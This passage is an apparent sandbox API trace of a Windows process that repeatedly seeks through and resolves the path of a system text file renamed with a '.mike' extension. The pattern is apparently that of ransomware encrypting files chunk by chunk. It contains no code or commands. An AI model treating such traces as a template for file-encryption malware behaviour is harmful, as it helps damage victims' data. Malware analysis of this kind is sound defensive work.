SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.010] SetFilePointer (in: hFile=0x284, lDistanceToMove=1167360, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x11d000 [0130.011] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.012] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.012] SetFilePointer (in: hFile=0x284, lDistanceToMove=1177600, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x11f800 [0130.014] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.015] SetFilePointer (in: hFile=0x284, lDistanceToMove=1187840, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x122000 [0130.016] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.017] SetFilePointer (in: hFile=0x284, lDistanceToMove=1198080, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x124800 [0130.018] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.020] SetFilePointer (in: hFile=0x284, lDistanceToMove=1208320, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x127000 [0130.021] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.022] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.022] SetFilePointer (in: hFile=0x284, lDistanceToMove=1218560, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x129800 [0130.023] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.024] SetFilePointer (in: hFile=0x284, lDistanceToMove=1228800, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x12c000 [0130.026] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.027] SetFilePointer (in: hFile=0x284, lDistanceToMove=1239040, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x12e800 [0130.028] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.060] SetFilePointer (in: hFile=0x284, lDistanceToMove=1249280, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x131000 [0130.062] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.063] SetFilePointer (in: hFile=0x284, lDistanceToMove=1259520, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x133800 [0130.064] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.065] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.065] SetFilePointer (in: hFile=0x284, lDistanceToMove=1269760, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x136000 [0130.066] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.068] SetFilePointer (in: hFile=0x284, lDistanceToMove=1280000, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x138800 [0130.069] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.070] SetFilePointer (in: hFile=0x284, lDistanceToMove=1290240, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x13b000 [0130.071] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.072] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.072] SetFilePointer (in: hFile=0x284, lDistanceToMove=1300480, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x13d800 [0130.074] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.076] SetFilePointer (in: hFile=0x284, lDistanceToMove=1310720, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x140000 [0130.078] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.078] SetFilePointer (in: hFile=0x284, lDistanceToMove=1320960, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x142800 [0130.080] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.081] SetFilePointer (in: hFile=0x284, lDistanceToMove=1331200, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x145000 [0130.082] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.083] SetFilePointer (in: hFile=0x284, lDistanceToMove=1341440, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x147800 [0130.084] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.086] SetFilePointer (in: hFile=0x284, lDistanceToMove=1351680, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x14a000 [0130.087] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.088] SetFilePointer (in: hFile=0x284, lDistanceToMove=1361920, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x14c800 [0130.089] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.090] SetFilePointer (in: hFile=0x284, lDistanceToMove=1372160, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x14f000 [0130.091] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.092] SetFilePointer (in: hFile=0x284, lDistanceToMove=1382400, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x151800 [0130.093] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.094] SetFilePointer (in: hFile=0x284, lDistanceToMove=1392640, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x154000 [0130.095] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.095] SetFilePointer (in: hFile=0x284, lDistanceToMove=1402880, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x156800 [0130.140] SleepEx (dwMilliseconds=0x2, bAlertable=0) returned 0x0 [0130.247] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.248] SetFilePointer (in: hFile=0x284, lDistanceToMove=1413120, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x159000 [0130.249] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.250] SetFilePointer (in: hFile=0x284, lDistanceToMove=1423360, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x15b800 [0130.251] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.252] SetFilePointer (in: hFile=0x284, lDistanceToMove=1433600, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x15e000 [0130.253] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.254] SetFilePointer (in: hFile=0x284, lDistanceToMove=1443840, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x160800 [0130.255] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.256] SetFilePointer (in: hFile=0x284, lDistanceToMove=1454080, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x163000 [0130.257] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.258] SetFilePointer (in: hFile=0x284, lDistanceToMove=1464320, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x165800 [0130.259] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.259] SetFilePointer (in: hFile=0x284, lDistanceToMove=1474560, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x168000 [0130.261] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.261] SetFilePointer (in: hFile=0x284, lDistanceToMove=1484800, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x16a800 [0130.263] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.263] SetFilePointer (in: hFile=0x284, lDistanceToMove=1495040, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x16d000 [0130.265] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.265] SetFilePointer (in: hFile=0x284, lDistanceToMove=1505280, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x16f800 [0130.266] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.267] SetFilePointer (in: hFile=0x284, lDistanceToMove=1515520, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x172000 [0130.268] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.269] SetFilePointer (in: hFile=0x284, lDistanceToMove=1525760, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x174800 [0130.503] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.504] SetFilePointer (in: hFile=0x284, lDistanceToMove=1536000, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x177000 [0130.507] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.522] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, 